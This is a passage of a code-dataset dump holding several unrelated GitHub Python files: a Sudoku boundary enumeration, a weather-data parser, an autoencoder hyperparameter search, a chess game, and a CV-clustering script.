the top row 123456789.\n\n Since the first row is always 123456789:\n\n - the first entry in such a permutation must be 1\n - the second entry can not be 1, 2 or 3. This gives 6 possibilities (4,5,6,7,8,9).\n - the third entry can not be 1,2,3 or the second entry. This leaves 5 possibilities. \n - after the top 3 entries are fixed, this leaves 6! possibilities for the remaining\n entries on the left side.\n\n In total this gives 6*5*(6!) = 21600 possible configurations for the left side\n (out of 9! = 362880).\n\n \"\"\"\n # 362880 entries: \n perms = list(itertools.permutations(['1','2','3','4','5','6','7','8','9']))\n\n # fixing top-left entry to 1 leaves 8! = 40320 possible left sides\n fix_1 = [x for x in perms if x[0] == '1']\n \n # Since the top-left 3x3 block can not contain 2 and 3 more\n # than once, we can further prune the possible left sides:\n exclude_23 = [x for x in fix_1 if (x[1] not in ['2', '3'] and x[2] not in ['2', '3'])]\n return exclude_23\n\ndef low_left_digit(in_txt): \n \"\"\"\n Return the digit in the lower left corner for the board 'in_txt' \n given as a 81 length string.\n\n \"\"\"\n return(in_txt[9*8 + 0])\n\ndef insert_left_side(left_side, board_string):\n \"\"\"\n Replace the left side of the Sudoku board 'board_string' with 'left_side'.\n \"\"\"\n # inputs should match in upper left corner\n assert(left_side[0] == board_string[0])\n # inputs should match in lower left corner\n assert(left_side[8] == low_left_digit(board_string))\n\n as_list = list(board_string)\n for idx in range(9):\n as_list[idx*9] = left_side[idx]\n return \"\".join(as_list)\n\ndef top_right_bottom_data():\n \"\"\"\n Load boards computed in Step 2. Return a list of strings \n where each string represents one board. \n \"\"\" \n fhandle = open(\"top-right-bottom-reduced.txt\", \"r\")\n result = fhandle.read().splitlines()\n fhandle.close()\n\n # check consistency\n assert(len(result) == 147372)\n for bline in result:\n assert(len(bline) == 81)\n assert(bline[0:9] == \"123456789\")\n return(result)\n\ndef test(board, left_sides):\n \"\"\"\n For a board 'board' where the top, right, and bottom borders are filled-in, test if \n its left side can be completed (from the list of left sides 'left_sides') so \n that there is a unique solution. \n\n Returns string:\n , , \n , \n , \n \"\"\"\n assert(len(board) == 81)\n\n uniques = 0\n non_uniques = 0\n completions = 0\n\n for left_side in left_sides:\n if low_left_digit(board) == left_side[8]:\n completions += 1\n solutions = JSolve(insert_left_side(left_side, board), 2) \n assert(solutions == 0 or solutions == 1 or solutions == 2)\n \n if solutions == 1:\n uniques += 1 \n\n if solutions > 1:\n non_uniques += 1\n\n return(board + \", \" + str(uniques) + \", \" + str(non_uniques) + \", \" + str(completions))\n\nif __name__ == \"__main__\":\n left_sides = compute_possible_left_sides() # precompute left sides\n for b in top_right_bottom_data():\n print(test(b, left_sides))\n\n","repo_name":"matiasdahl/Boundary-Sudoku","sub_path":"src-step3/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37710767913","text":"# encoding: utf-8\n\n\"\"\"\n\nParsers for Belgingur's standard data format(s)\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport re\n\nfrom parser import SeparatedTextObservationParser, InsufficientHeaders\nfrom util.calculator import parse_iso_date\nfrom util.utilities import whLogger\n\n\nLOG = whLogger(__name__)\n\nHEADER_SEPARATOR = re.compile('\\s*[:=\\s]\\s*')\n\"\"\" Separates name from value in headers. \"\"\"\n\nFIELD_ALIASES = {\n 'timestamp': 'time',\n 'precipitation': 'prec_rate',\n 'prec': 'prec_rate',\n}\n\"\"\" Alternate names for field, so we can accept files using slightly different names. \"\"\"\n\nFLOAT_FIELDS = ('wind_speed', 'wind_dir', 'wind_gust',\n 'temp', 'temp_road', 'temp_ground',\n 'pressure', 'rel_hum', 'air_density')\n\n\nclass BelgingurObservationParser(SeparatedTextObservationParser):\n \"\"\"\n Belgingur-standard observation files. They consist of:\n\n * any number of header lines of the form `## key: value` where key and value are separated by white-space and optionally a : or =\n * exactly one\n \"\"\"\n\n def __init__(self):\n super(BelgingurObservationParser, self).__init__('\\s*[,\\s]\\s*')\n\n def pick_converter(self, name):\n if name in FLOAT_FIELDS:\n return float\n if name in ('time',):\n return parse_iso_date\n return str\n\n def add_field(self, i, name):\n name = name.replace('.', '_').replace('-', '_')\n name = FIELD_ALIASES.get(name, name)\n converter = self.pick_converter(name)\n self.field_list.append((name, converter, i))\n\n def parse_header_line(self, line):\n \"\"\"\n :type line: string\n \"\"\"\n if line == '':\n return True\n if line.startswith('##'):\n line = line[2:].strip()\n parts = HEADER_SEPARATOR.split(line, 1)\n if len(parts) == 2:\n self.meta[parts[0]] = parts[1]\n return True\n if line.startswith('#'):\n if len(self.field_list) > 0:\n raise ValueError('We only expect one header line starting with a single \"#\" for column labels.')\n parts = self.separator.split(line[1:].strip())\n for i, part in enumerate(parts):\n self.add_field(i, part)\n return True\n\n if len(self.field_list) == 0:\n raise InsufficientHeaders('We expect exactly one one header line starting with a single \"#\" for column labels.')\n return False\n","repo_name":"Esli92/legendary-seagull-cloud","sub_path":"observaciones/scripts/WeatherHillsQA/shared/parser/belgingur.py","file_name":"belgingur.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17656107589","text":"from deepautoencoder_012 import StackedAutoEncoder\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport scipy.io as sio\n##import pandas\nimport scipy\nimport csv\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n##import plotly.plotly as py\n##import pylab as plt\nimport tensorflow as tf\n\nimport skopt\nfrom skopt import gp_minimize , forest_minimize\n\n\nfrom skopt.space import Real, Categorical, Integer\nfrom skopt.plots import plot_convergence\nfrom skopt.plots import plot_objective, plot_evaluations\n##from skopt.plots import plot_histogram, plot_objective_2D\nfrom skopt.utils import use_named_args\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tempfile import TemporaryFile\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndim_learning_rate = Categorical(categories=['0.0005'], name='learning_rate')\ndim_learning_rate2 = Categorical(categories=['0.001'], name='learning_rate2') \ndim_num_dense_nodes1 = Categorical(categories=['100','600','1200'], name='num_dense_nodes1') #,'1500','2000'\ndim_alpha = Categorical(categories=['0.0001','0'], name='alpha') \ndim_beta = Categorical(categories=['100','10','1','0.0001','0'], name='beta') #,,'0.1','0.01','0.001','0.0001','0.00001','0.000001' '1','2','3','4','5','6','7','8','9','10','100' '0.001','0.01', ,'0.5','2.5','7.5' ,'0.5','0.1','0.01','0.001','0.00001','0'\ndim_acf = Categorical(categories=['sigmoid','tanh'], name='acf') #,'relu',,'tanh' \ndim_dcf = Categorical(categories=[ 'sigmoid'], name='dcf') #,'linear'\ndim_winit = Categorical(categories=['2'], name='winit') #'1','2','3','4','5','6','7'\ndim_w = Categorical(categories=['tied','transpose'], name='w') #'he_uniform','caffe_uniform','he_normal','caffe_normal'\ndim_opt = Categorical(categories=['Adam'] ,name='opt') # 'Adam', ,'GradientDescent' ,'Adadelta','Adagrad' 'RMSProp',\ndim_epoch=Categorical(categories=['2000'], name='epoch') #,'3000','5000'\ndim_L = Categorical(categories=['rmse_LDA1','rmse_LDA2','rmse_LDA1_TFT','rmse_LDA2_TFT','rmse_LDA1_S1','rmse_LDA1_S2','rmse_LDA1_S3','rmse_LDA1_S4'], name='L')\n##dim_Drop = Categorical(categories=['0.01','0.05','0.1','0.15','0.2','0.25'], name='Drop')\ndim_stdr = Categorical(categories=['0'], name='std')\ndim_HC = Categorical(categories=['1'], name='HC') # ,'3'\ndim_Coef = Categorical(categories=['0.5'], name='Coef') #,'0.5','0.75','1' ,'0.5','0.75'\ndim_epochFC=Categorical(categories=['20000'], name='epochFC') #'500', '1000', '3000','6000', '9000', '12000','15000'\ndim_C = Categorical(categories=['0.01'], name='C') #,'0.1','1'\ndim_G = Categorical(categories=['0.001'], name='G') #'0.01','0.1','1','10'\ndim_batch= Categorical(categories=['50'], name='batch') #\n\n\n\ndimensions = [dim_learning_rate,dim_learning_rate2,\n dim_num_dense_nodes1,\n dim_alpha,\n dim_beta,\n dim_acf,\n dim_dcf,\n dim_winit,\n dim_opt,\n dim_epoch,dim_HC,dim_Coef,dim_C,dim_G,dim_batch,dim_stdr,dim_w,dim_L] #,dim_stdr,dim_epochFC,dim_Drop\n\n\ndefault_parameters = ['0.0005', '0.001', '100', '0', '1', 'tanh', 'sigmoid', '2', 'Adam', '2000', '1', '0.5', '0.01', '0.001','50','0','transpose','rmse_LDA1_S1']\n\n\ndef log_dir_name(learning_rate,learning_rate2,num_dense_nodes1,alpha,beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L): \n\n # The dir-name for the TensorBoard log-dir.\n s = \"./19_logs/lr_{0:.0e}_nodes_{1}_{2}/\"\n\n # Insert all the hyper-parameters in the dir-name.(\n log_dir = s.format(learning_rate,learning_rate2,\n num_dense_nodes1,\n alpha,\n beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L) \n\n return log_dir\n\nbest_c=0\n\n@use_named_args(dimensions=dimensions)\ndef fitness(learning_rate,learning_rate2,num_dense_nodes1 ,alpha,beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L): \n\n # Print the hyper-parameters.\n print('learning rate: ',learning_rate)\n## print('learning rate2: ',learning_rate2)\n print('num_dense_nodes1: ', num_dense_nodes1)\n print('alpha: ',alpha)\n print('beta: ',beta)\n print('acf: ',acf)\n print('dcf: ',dcf)\n## print('winit',winit)\n print('opt',opt)\n print('Epoch DRAE ',epoch)\n## print('stdr :', std)\n## print('HC :',HC)\n## print('Coef. :',Coef)\n## print('C :',C)\n## print('G. :',G) \n## print('Batch :',batch)\n print('w. :',w) \n print('loss :',L)\n## print('Epoch FC :',epochFC)\n print()\n\n mat = sio.loadmat('R2_sort_G0D_G2A_mat2ray_adjust(img)_pas10.mat', squeeze_me=True) \n\n X0=mat['R10'] \n X2=mat['R12']\n\n## XE=mat['R122_v']\n\n X0=X0[0:1300]\n X2=X2[0:1300]\n\n y0=np.zeros(len(X0))\n y2=np.ones(len(X2)) \n y=np.concatenate((y0,y2),axis=0)\n\n \n X=np.concatenate((X0, X2), axis=0)\n\n if(std==1):\n s = StandardScaler().fit(X)\n X0 = s.transform(X0)\n X2 = s.transform(X2)\n \n n=2\n skf = StratifiedKFold(n_splits=n,shuffle=True)\n\n## kf = KFold(n_splits=int(n),shuffle=True) \n f=fm=0\n atr=ats=0\n for train_index, test_index in skf.split(X, y):\n f+=1\n print(\"||||||||||||||||||||||||||||||||||||||||||||\")\n print(\"------------------------------------- Data\",f)\n print(\"||||||||||||||||||||||||||||||||||||||||||||\")\n\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n X0_train=X_train[y_train==0]\n X2_train=X_train[y_train==1]\n X0_test=X_test[y_test==0]\n X2_test=X_test[y_test==1]\n## X0_train, X0_test = X0[train_index], X0[test_index]\n## X2_train, X2_test = X2[train_index], X2[test_index]\n XE=np.concatenate((X0_train, X2_train), axis=0)\n\n x0=X0_train\n x1=X2_train\n x0vl=X0_test\n x1vl=X2_test\n \n model1 = StackedAutoEncoder(dims=[int(num_dense_nodes1)], act=acf,dct=dcf, loss=L, lr=float(learning_rate),W=w,\n batch_size=int(batch), print_step=51,alpha=float(alpha),beta=float(beta),winit=winit,opt=opt , epoch=int(epoch),C=float(C),G=float(G)) #, HC=int(HC),Coef=float(Coef)\n\n F0,F0t,F2,F2t,W1,b1,f1,ats,pts,rts,fts,Lts,Lt=model1.fit(X0_train,X2_train,X0_test,X2_test,XE,1) \n sio.savemat('Features_R1_fold_'+str(f)+'_AE2.mat',{'F0': F0, 'F2': F2, 'F0t': F0t, 'F2t': F2t})\n \n## if f1<0.5:\n## break\n fm=fm+f1\n \n c=fm/n\n print(\"====================================\")\n print(\"Score: {0:.2%}\".format(c))\n print(\"====================================\")\n\n global best_c\n \n if c > best_c:\n # Update the classification accuracy.\n best_c = c #\n \n sio.savemat('R1.mat',{'F0': F0, 'F2': F2, 'F0t': F0t, 'F2t': F2t})\n\n return -c\n\n\nsearch_result = gp_minimize(func=fitness,\n dimensions=dimensions,\n acq_func='EI', # Expected Improvement.\n n_calls=100,\n x0=default_parameters)\nprint(search_result.x)","repo_name":"safaeazz/speech_recognition_motionsensors","sub_path":"optimize_param.py","file_name":"optimize_param.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35170256518","text":"from pieces import Pieces\nfrom pawn import Pawn\nfrom king import King\nfrom queen import Queen\nfrom bishop import Bishop\nfrom rook import Rook\nfrom knight import Knight\nimport numpy as np\n\n\nclass Game():\n def __init__(self):\n ##might need to add self before all of these\n pawn_w1 = Pawn('white', np.array([6,0]))\n pawn_w2 = Pawn('white', np.array([6,1]))\n pawn_w3 = Pawn('white', np.array([6,2]))\n pawn_w4 = Pawn('white', np.array([6,3]))\n pawn_w5 = Pawn('white', np.array([6,4]))\n pawn_w6 = Pawn('white', np.array([6,5]))\n pawn_w7 = Pawn('white', np.array([6,6]))\n pawn_w8 = Pawn('white', np.array([6,7]))\n rook_w1 = Rook('white', np.array([7,0]))\n rook_w2 = Rook('white', np.array([7,7]))\n knight_w1 = Knight('white', np.array([7,1]))\n knight_w2 = Knight('white', np.array([7,6]))\n bishop_w1 = Bishop('white', np.array([7,2]))\n bishop_w2 = Bishop('white', np.array([7,5]))\n queen_w = Queen('white', np.array([7,3]))\n self.king_w = King('white', np.array([7,4]))\n pawn_b1 = Pawn('black', np.array([1,0]))\n pawn_b2 = Pawn('black', np.array([1,1]))\n pawn_b3 = Pawn('black', np.array([1,2]))\n pawn_b4 = Pawn('black', np.array([1,3]))\n pawn_b5 = Pawn('black', np.array([1,4]))\n pawn_b6 = Pawn('black', np.array([1,5]))\n pawn_b7 = Pawn('black', np.array([1,6]))\n pawn_b8 = Pawn('black', np.array([1,7]))\n rook_b1 = Rook('black', np.array([0,0]))\n rook_b2 = Rook('black', np.array([0,7]))\n knight_b1 = Knight('black', np.array([0,1]))\n knight_b2 = Knight('black', np.array([0,6]))\n bishop_b1 = Bishop('black', np.array([0,2]))\n bishop_b2 = Bishop('black', np.array([0,5]))\n queen_b = Queen('black', np.array([0,3]))\n self.king_b = King('black', np.array([0,4]))\n #print(Pieces.board)\n \n #this just gives a nicer representation of the board for visual aid\n def nice_board(self):\n nice_board = np.full((8,8), None)\n for i in range(8):\n for j in range(8):\n if Pieces.board[i][j] != None:\n #nice_board[i][j] = np.array([Pieces.board[i][j].name[:2].title(), Pieces.board[i][j].colour[:1].title()])\n nice_board[i][j] = Pieces.board[i][j].name[:2].title() + '_' + Pieces.board[i][j].colour[:1].title()\n else:\n nice_board[i][j] = '____'\n\n print(nice_board)\n\n #this checks for check in all scenarios\n ## just need to add possible knight threat\n def is_check(self, king, prev_new_pos):\n\n #check to see if threat by knight\n if Pieces.board[prev_new_pos[0]][prev_new_pos[1]].name == 'knight':\n if Pieces.board[prev_new_pos[0]][prev_new_pos[1]].move(king.current_pos, Pieces.board, apply = False) == True:\n return True, prev_new_pos\n\n # Lambda function to change through the different angles\n dir = lambda angle: np.around(np.array([np.sin(angle), np.cos(angle)])/max(abs(np.array([np.cos(angle), np.sin(angle)])))).astype(int)\n #Changes to True if king is under threat\n any_threat = False\n\n #this is the angle to change the dir lambda function\n theta = 0\n #keep going until 1/8 turn around the unit circle is checked\n while theta < 2*np.pi:\n #sets position that is being checked\n pos = king.current_pos + dir(theta)\n #keep going while the position is still within the board\n while 0 <= pos[0] < 8 and 0 <= pos[1] < 8:\n #if space is non-empty\n if Pieces.board[pos[0]][pos[1]] != None:\n #if colour is same return False\n if Pieces.board[pos[0]][pos[1]].colour == king.colour:\n break\n else:\n #if colour is opposite and the take on king is valid any_threat = True\n if Pieces.board[pos[0]][pos[1]].move(king.current_pos, Pieces.board, apply = False) == True:\n any_threat = True\n break\n else:\n #adjusts the position along the direction\n pos = pos + dir(theta)\n #adds 1/8 turn to theta to check the next direction\n theta = theta + np.pi/4\n #print(any_threat)\n return any_threat, pos\n\n\n def is_check_mate(self, king, new_pos):\n #if king is under check\n if self.is_check(king, new_pos)[0] == False:\n return False\n else:\n #threat_pos = self.is_check(king, new_pos)[1]\n threat_pos = new_pos\n \n #check whether king can move away from threat\n #lambda funcion to give each directional move\n direction = lambda theta: np.around(np.array([np.cos(theta), np.sin(theta)])/max(abs(np.array([np.cos(theta), np.sin(theta)])))).astype(int)\n \n angle = 0\n #continue until we have traversed each eighth\n while angle < 2*np.pi:\n #possible position for the king\n check_pos = king.current_pos + direction(angle)\n \n #remembering original positions in case we want to return back\n space = Pieces.board[check_pos[0]][check_pos[1]]\n king_orig = king.current_pos\n\n #if within the bounds of the board\n if 0 <= check_pos[0] < 8 and 0 <= check_pos[1] < 8:\n #if the move is available\n #this also applies the move when it is\n if king.move(check_pos, Pieces.board) == False:\n pass\n else:\n #if king is not in check\n if self.is_check(king, new_pos)[0] == False:\n #reset the board to previous one - I dont want to apply the move here, just check\n Pieces.board[king_orig[0]][king_orig[1]] = king\n king.current_pos = king_orig\n Pieces.board[check_pos[0]][check_pos[1]] = space\n return False\n #if king is in check\n else:\n #reset the board to previous one\n Pieces.board[king_orig[0]][king_orig[1]] = king\n king.current_pos = king_orig\n Pieces.board[check_pos[0]][check_pos[1]] = space\n \n #add to angle to check the next direction\n angle += np.pi/4\n\n #making list of positions to move to!\n if Pieces.board[threat_pos[0]][threat_pos[1]].name != 'knight':\n #calculating direction from threat piece to king\n dir = king.current_pos - threat_pos\n distance = max(abs(dir))\n dir_hat = (dir/distance).astype(int)\n\n #list of all positions from threat piece to king\n pos_list = [threat_pos + i*dir_hat for i in range(distance)]\n else:\n #if threat piece = knight then we just need to knight position\n pos_list = [threat_pos]\n\n #check whether any piece that is alive and same colour as king can block threat - need a list of available pieces\n #this is a list of all pieces that are same colour as king and are alive and is not a king\n piece_list = [piece for piece in Pieces.instances if (piece.colour == king.colour and piece.is_alive == True and piece.name != 'king')]\n\n\n for piece in piece_list:\n for pos in pos_list:\n #if the move to block theat is available then it is not check mate\n if piece.move(pos, Pieces.board, apply = False) == True:\n return False\n else:\n pass\n \n return True\n\n def is_stale_mate(self, colour):\n #this is a list of all pieces that are the same colour as the player and are alive\n piece_list = [piece for piece in Pieces.instances if (piece.colour == colour and piece.is_alive == True)]\n \n\n for piece in piece_list:\n #different condition for knight\n if piece.name == 'knight':\n #check all knight positions\n pass\n else:\n #lambda funcion to give each directional move\n direction = lambda theta: np.around(np.array([np.cos(theta), np.sin(theta)])/max(abs(np.array([np.cos(theta), np.sin(theta)])))).astype(int)\n \n angle = 0\n #continue until we have traversed each eighth\n while angle < 2*np.pi:\n #possible position for the piece\n check_pos = piece.current_pos + direction(angle)\n\n #if within the bounds of the board\n if 0 <= check_pos[0] < 8 and 0 <= check_pos[1] < 8:\n #if the piece can move then it cannot be stalemate\n if piece.move(check_pos, Pieces.board, apply=False) == True:\n return False\n else:\n continue\n else:\n continue\n \n return True\n\n '''\n FOR ABOVE: this will work for all pieces but not kings\n we also need to distingusih whether the king moves to check\n Not possible without applying move as ive written it\n '''\n \n\n\n #check direction\n #in each direction check the line\n #when a move is invalid along the line, break\n\n return False\n\n def is_valid_input(self, pos):\n try:\n #checks if inputs are integers\n\n #if all(isinstance(element, int) for element in pos):\n if pos[0].is_integer() == True and pos[1].is_integer() == True:\n #checks if they are within boounds of the board\n if 0 <= pos[0] < 8 and 0 <= pos[1] < 8:\n return True\n else:\n ValueError(\"The position must be within the board, that is 0-7 for each input\")\n else:\n raise ValueError('All elements inside your list are not integers')\n\n except ValueError as error:\n print('Caught an error: ' + repr(error))\n return False\n\n #check whether pawn has reached the end of the board\n def is_promotion(self, new_pos):\n if Pieces.board[new_pos[0]][new_pos[1]].name == 'pawn' and (new_pos[0] == 0 or new_pos[0] == 7):\n return True\n else:\n return False\n\n #apply promotion to the board\n def promotion(self, new_pos):\n\n #what piece does player want to promote to\n piece_letter = '0'\n while piece_letter not in ['Q', 'K', 'B', 'R']:\n piece_letter = input(\"Please type the letter of the piece you wish to promote, Q=queen, K=knight, B=bishop and R=rook: \").upper()\n\n piece_colour = Pieces.board[new_pos[0]][new_pos[1]].colour\n piece_pos = np.array(new_pos)\n\n #pawn is no longer alive\n Pieces.board[new_pos[0]][new_pos[1]].is_alive = False\n\n if piece_letter == 'Q':\n Queen(piece_colour, piece_pos)\n elif piece_letter == 'K':\n Knight(piece_colour, piece_pos)\n elif piece_letter == 'B':\n Bishop(piece_colour, piece_pos)\n elif piece_letter == 'R':\n Rook(piece_colour, piece_pos)\n\n\n def run_game(self):\n white_or_black = 0\n new_pos = np.array([0,0])\n\n #previous new_pos for determining knight check\n prev_new_pos = np.array([0,0])\n king = self.king_w\n\n while True:\n #printing visually easy board\n self.nice_board()\n\n #keeps track of en passant\n Pieces.en_pass_count += 1\n #just need to determine whos turn it is\n\n #break clause if player wants to start again\n if (new_pos == np.array([-1,-1])).all() == False:\n #making sure its the correct colours turn\n if white_or_black == 0:\n colour = 'white'\n #changes players turn\n white_or_black += 1\n #sets kings for whites go, used for check/checkmate etc.\n king = self.king_w\n king_op = self.king_b\n else:\n colour = 'black'\n #changes players turn\n white_or_black -= 1\n #sets kings for blacks go, used for check/checkmate etc.\n king = self.king_b\n king_op = self.king_w\n print(f\"It is {colour} players turn.\")\n\n #Gets input from player\n piece_pos = np.array([int(input(\"Please input the row of the piece position: \")), int(input(\"Please input the column of the piece position: \"))])\n #repeat if input is invalid, the input is not a piece, or the piece is not the right colour\n while self.is_valid_input(piece_pos) == False or Pieces.board[piece_pos[0]][piece_pos[1]] == None or Pieces.board[piece_pos[0]][piece_pos[1]].colour != colour:\n print(\"This input is invalid, please try again.\")\n piece_pos = np.array([int(input(\"Please input the row of the piece position: \")), int(input(\"Please input the column of the piece position: \"))])\n \n #create a piece variable, remeber board cant be adapted from this variable\n piece = Pieces.board[piece_pos[0]][piece_pos[1]]\n\n #Option to start the choices again by entering [-1,-1]\n print(\"If you would like to start your choices again please enter -1 then -1 again.\")\n #Gets input from player for desired new position\n new_pos = np.array([int(input(\"Please input the row of the new position: \")), int(input(\"Please input the column of the new position: \"))])\n \n if (new_pos == np.array([-1,-1])).all() == False:\n while self.is_valid_input(new_pos) == False or piece.move(new_pos, Pieces.board, apply = False) == False:\n print(\"This input is invalid, please try again.\")\n new_pos = np.array([int(input(\"Please input the row of the new position: \")), int(input(\"Please input the column of the new position: \"))])\n if (new_pos == np.array([-1,-1])).all() == True:\n break\n\n ##this won't work for castling into a check!! I don't think\n if (new_pos == np.array([-1,-1])).all() == False:\n #remember what was in the new space in case we have to revert\n space = Pieces.board[new_pos[0]][new_pos[1]]\n\n ##if king is under check\n ##we cannot apply castling - so piece.move cannot be a castle\n if self.is_check(king, prev_new_pos)[0] == True:\n king.is_check == True\n\n #move the piece\n piece.move(new_pos, Pieces.board)\n\n #if we move our own king into check\n if self.is_check(king, prev_new_pos)[0] == True:\n #reset the board to previous one\n Pieces.board[piece_pos[0]][piece_pos[1]] = piece\n piece.current_pos = piece_pos\n Pieces.board[new_pos[0]][new_pos[1]] = space\n\n ##NEED to go back to correct board of a castle put king in check\n ##Need to replace rook and king to original positions\n \n #if there is check mate on king then break the while loop\n if self.is_check_mate(king_op, new_pos) == True:\n break\n\n #start the go again\n new_pos = np.array([-1, -1])\n print(\"This move is invalid. There is a check on the King.\")\n else:\n king.is_check == False\n #set prev_new_pos to memory for knight check\n prev_new_pos = new_pos\n \n #this is to cover the pawn change at the end\n ##NEED TO CHECK WHETHER THIS WORKS\n if self.is_promotion(new_pos) == True:\n self.promotion(new_pos)\n \n ##this might need changing when stale_mate is involved.\n ##might have to be moved within conditional for check_mate \n print(f\"The game has ended! {colour}'s have won the game.\")\n\n\ngame = Game()\ngame.run_game()\n\n\n\ndef run_game(self):\n\n\n #while checkmate and stalemate are false - stay in the game\n \n #print nice board\n\n #input piece initialised to [-1,-1]\n\n #while input is invalid ##invalid here refers to whether this is a piece of correct colour\n\n #get input from player ##if player would like to start again input [-1,-1]\n\n #if input == [-1,-1]\n #break and stay on same turn\n\n #input position initialised\n\n #while input is invalid ##invalid here refers to whether space is blank or opposite colour and the piece can move like that\n \n # get input from player ##if player would like to start again input [-1,-1]\n\n #if input == [-1,-1]\n #break and stay on same turn\n \n #if current colour is in check after move -- maybe add this to while loop?\n #invalid move, repeat input\n \n #if input is promotion\n #apply promotion\n\n #apply move\n\n #END GAME\n\n\n pass","repo_name":"leopitsillides2000/Chess","sub_path":"Pieces/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10102329441","text":"import numpy as np\nimport pandas as pd\nimport nltk\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport cvrml.common.constants as CONSTANTS\nfrom cvrml.common.ntlk_utility import chunkArrayOfStringForNoun\nfrom cvrml.common.file_utility import directoryFilesToArrayString\nfrom cvrml.common.file_utility import stripTags\nimport codecs\nfrom sklearn import feature_extraction\nimport pickle\n\nfrom cvrml.common.model_utility import load_training_cv_for_cat\n\n# load nltk's SnowballStemmer as variabled 'stemmer'\nfrom nltk.stem.snowball import SnowballStemmer\nstemmer = SnowballStemmer(\"english\")\n\ndef br():\n print(\"----------------------------------------------------------------------\")\n\ndef load_training_cv_category(location):\n outdata= []\n for file_name in os.listdir(location):\n if file_name.startswith(\".\") : continue\n with open(os.path.join(location,file_name), encoding=\"utf-8\") as fin:\n doc = fin.read()\n outdata.append(doc)\n return outdata\n\ndef tokenize_and_stem(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n stems = [stemmer.stem(t) for t in filtered_tokens]\n return stems\n\ndef tokenize_only(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n return filtered_tokens\n\n# cv_jobs = load_training_cv_category(CONSTANTS.TRAINING_CV[\"job\"])\ndef readAndSave():\n dataDirs = [\"C:/tmp/datax-cv/resumes_and_jobs/backend_developer_jobs\"\n ,\"C:/tmp/datax-cv/resumes_and_jobs/business_developer_jobs\" ]\n\n docData = []\n for dir in dataDirs :\n docData.extend(directoryFilesToArrayString(dir))\n print(\"Number of Files = \", len(docData))\n\n cv_jobs = stripTags(docData)\n cv_jobs = chunkArrayOfStringForNoun(cv_jobs)\n pickle.dump(cv_jobs, open(\"deleteme.p\", \"wb\"))\n # exit()\n\n# readAndSave()\n\ncv_jobs = pickle.load(open(\"deleteme.p\",\"rb\"))\nprint(\"Number of jobs cv = {0}\".format(len(cv_jobs)))\n\ntotalvocab_stemmed = []\ntotalvocab_tokenized = []\nfor i in cv_jobs:\n allwords_stemmed = tokenize_and_stem(i)\n totalvocab_stemmed.extend(allwords_stemmed)\n allwords_tokenized = tokenize_only(i)\n totalvocab_tokenized.extend(allwords_tokenized)\n\nvocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\nprint(vocab_frame)\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\ntfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000,\n min_df=0.2, stop_words='english',\n use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,2))\n\ntfidf_matrix = tfidf_vectorizer.fit_transform(cv_jobs)\nterms = tfidf_vectorizer.get_feature_names()\nprint(tfidf_matrix.shape)\nprint(tfidf_matrix)\nprint(terms)\n\n# from sklearn.metrics.pairwise import cosine_similarity\n# dist = 1 - cosine_similarity(tfidf_matrix)\n# print(len(dist[0]))\n# exit()\n\nfrom sklearn.cluster import KMeans\nnum_clusters = 2\nkm = KMeans(n_clusters=num_clusters)\nkm.fit(tfidf_matrix)\nprint(km.n_clusters)\n\nclusters = km.labels_.tolist()\nprint(\"Length of cluster variable= {0}\".format(len(clusters)))\nprint(clusters)\n\nbr()\n\nimport pandas as pd\n\ndata = { 'doc': cv_jobs, 'cluster': clusters}\nframe = pd.DataFrame(data, index = [clusters] , columns = ['doc', 'cluster'])\n# print(frame)\n\nbr()\n\n# from __future__ import print_function\n\nprint(\"Top terms per cluster:\")\nprint()\norder_centroids = km.cluster_centers_.argsort()[:, ::-1]\nprint(km.cluster_centers_.argsort())\nfor i in range(num_clusters):\n print(\"Cluster %d words:\" % i, end='')\n for ind in order_centroids[i, :5]:\n print(' %s' % terms[ind], end=',')\n # print(' %s' % vocab_frame.ix[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',')\n print()\n print()\n print(\"Cluster %d doc:\\n\" % i, end='')\n for title in frame.ix[i]['doc'].values.tolist():\n print(title[:230])\n print()\n print()\n\n","repo_name":"sohcalvin/ref","sub_path":"python/cluster_cv.py","file_name":"cluster_cv.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} 